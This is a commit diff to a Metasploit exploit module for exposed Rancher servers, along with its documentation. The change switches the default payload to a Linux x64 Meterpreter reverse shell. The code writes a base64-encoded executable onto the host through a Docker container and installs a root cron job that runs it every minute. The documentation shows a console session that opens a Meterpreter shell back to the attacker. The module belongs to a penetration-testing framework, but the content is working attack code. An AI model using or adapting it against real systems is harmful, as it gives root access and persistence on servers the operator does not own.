Change arch to ARCH_X64

Author: mpizala

documentation/modules/exploit/linux/http/rancher_server.md

@@ -105,8 +105,8 @@ See Rancher docs for [api-keys][5] and [membership-roles][6].
 msf > use exploit/linux/http/rancher_server
 msf exploit(rancher_server) > set RHOST 192.168.91.111
 RHOST => 192.168.91.111
-msf exploit(rancher_server) > set PAYLOAD python/meterpreter/reverse_tcp
-PAYLOAD => python/meterpreter/reverse_tcp
+msf exploit(rancher_server) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
 msf exploit(rancher_server) > set LHOST 192.168.91.1
 LHOST => 192.168.91.1
 msf exploit(rancher_server) > set VERBOSE true
@@ -129,11 +129,10 @@ msf exploit(rancher_server) > exploit
 [+] Deleted /tmp/jxKUxUyN
 
 meterpreter > sysinfo
-Computer        : rancher
-OS              : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26)
-Architecture    : x64
-System Language : en_US
-Meterpreter     : python/linux
+Computer     : rancher
+OS           : Debian 9.1 (Linux 4.9.0-3-amd64)
+Architecture : x64
+Meterpreter  : x64/linux
 meterpreter >
 ```
 

modules/exploits/linux/http/rancher_server.rb

@@ -30,26 +30,17 @@ def initialize(info = {})
         'URL'            => 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'
       ],
       'Platform'         => 'linux',
-      'Targets'          => [
-        [ 'Python', {
-          'Platform'     => 'python',
-          'Arch'         => ARCH_PYTHON,
-          'Payload'      => {
-            'Compat'     => {
-              'ConnectionType' => 'reverse noconn none tunnel'
-            }
-          }
-        }]
-      ],
-      'DefaultOptions' => { 'WfsDelay' => 75, 'Payload' => 'python/meterpreter/reverse_tcp' },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jul 27, 2017'))
+      'Arch'             => [ARCH_X64],
+      'Targets'          => [[ 'Linux', {} ]],
+      'DefaultOptions'   => { 'WfsDelay' => 75, 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
+      'DefaultTarget'    => 0,
+      'DisclosureDate'   => 'Jul 27, 2017'))
 
     register_options(
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'Path to Rancher Environment', '/v1/projects/1a5' ]),
-        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]),
         OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
         OptString.new('HttpUsername', [false, 'Rancher API Access Key (Username)']),
@@ -80,13 +71,10 @@ def make_cmd(mnt_path, cron_path, payload_path)
     echo_cron_path = mnt_path + cron_path
     echo_payload_path = mnt_path + payload_path
 
-    cron_command = "python #{payload_path}"
-    payload_data = payload.raw
-
-    command = "echo \"#{payload_data}\" >> #{echo_payload_path} \&\& "
+    command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
     command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
     command << "echo \"\" >> #{echo_cron_path} \&\& "
-    command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
+    command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}"
 
     command
   end